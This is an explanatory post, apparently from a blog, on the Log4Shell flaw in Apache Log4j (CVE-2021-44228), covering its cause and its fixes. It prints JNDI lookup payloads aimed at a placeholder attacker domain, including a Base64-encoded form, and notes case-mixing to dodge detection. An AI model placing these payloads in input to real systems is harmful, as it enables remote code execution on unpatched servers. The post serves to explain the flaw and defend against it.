Log4Shell is a vulnerability in the Apache Log4j Java-based logging library. Log4j is a fast, flexible and reliable logging framework (APIS) written in Java Programming Language. Log4j 2(Apache Log4j 2.0–2.14.1) versions which is a very common logging library used by applications across the world.
The open-source Apache Log4j library has over 400,000 downloads from its Github project, according to cybersecurity firm Check Point.
What is the Log4Shell vulnerability?
The vulnerability first came to light on December 2021.and was highlighted by Alibaba Cloud Security team’s Chen Zhaojun. The vulnerability is dubbed Log4Shell and is officially CVE-2021–44228 (CVE number is the unique number given to each vulnerability discovered across the world).The vulnerability is serious because exploiting it could allow hackers to control java-based web servers and launch what are called ‘remote code execution’ (RCE) attacks. In simple words, the vulnerability could allow a hacker to take control of a system without any authentication.
The vulnerability occurs due to a lack of sanitization in the lookup method used in the log4j library. An attacker can leverage JNDI (Java Naming and Directory Interface) to perform a request to a remote malicious payloads or other scripts as follows
${jndi:ldap://[attacker_domain]/file}
${jndi:rmi://[attacker_domain]/file}
We use other protocols like RMI,CORBA,LDAP and comments like upper/lower by creating different combinations for attacking affected machines. For avoiding the detection of payload attacker can also use encoded form of the a remote malicious payloads or other scripts like
${jndi:rmi://[attacker_domain]/Basic/Commant/Base64/[encoded file name]}
Remediating the Log4Shell vulnerability
The easiest way to remediate this is to update to Log4j version 2.16.0 or later, as this behavior is now disabled by default. In previous releases (>2.10) this behavior can be mitigated by setting the system property
log4j2.formatMsgNoLookups=true
by adding the following Java parameter: -Dlog4j2.formatMsgNoLookups=true
These are variables which Log4j uses to determine if it should perform lookups or not .or Add WAF rules to block malicious inbound requests .You might need to add these manually, but some WAF providers, such as have already released new rules to deny requests that look like malicious attacks against this vulnerability.
Leave a Reply